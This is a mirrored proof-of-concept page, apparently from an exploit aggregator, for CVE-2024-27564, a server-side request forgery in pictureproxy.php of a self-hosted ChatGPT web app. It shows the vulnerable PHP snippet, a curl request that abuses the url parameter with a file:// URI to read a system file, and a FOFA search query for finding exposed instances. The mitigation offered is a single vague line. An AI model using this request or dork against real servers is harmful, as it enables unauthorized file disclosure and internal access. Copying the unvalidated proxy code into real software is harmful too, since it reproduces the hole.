CVE-2024-27564 PoC — ChatGPT 安全漏洞

Source

https://github.com/Quantum-Hacker/CVE-2024-27564

Associated Vulnerability

Title:ChatGPT 安全漏洞 (CVE-2024-27564)
Description:pictureproxy.php in the dirk1983 mm1.ltd source code f9f4bbc allows SSRF via the url parameter. NOTE: the references section has an archived copy of pictureproxy.php from its original GitHub location, but the repository name might later change because it is misleading.

Readme

# CVE-2024-27564

## Description:
A vulnerability in `pictureproxy.php` allows remote attackers to perform arbitrary requests by injecting URLs into the url parameter. This SSRF vulnerability can be exploited without authentication, making it particularly dangerous.

The vulnerable code is in the `pictureproxy.php` file. The issue occurs because the function does not properly validate the `url` parameter. The `$_GET['url']` variable is passed to the `file_get_contents()` function, which fetches content from the specified URL. This can lead to SSRF.

## PoC:
```
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}
```

Curl Request:
```
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
```

## Dorking:
FOFA= `"title="ChatGPT个人专用版""`

## Mitigation:
Proper Management of Input validation is needed.

File Snapshot


 [4.0K]  /data/pocs/10e41a4cb5c25e4755729d95907e3da80e356769
├── [ 756]  chatgpt.yaml
└── [ 962]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!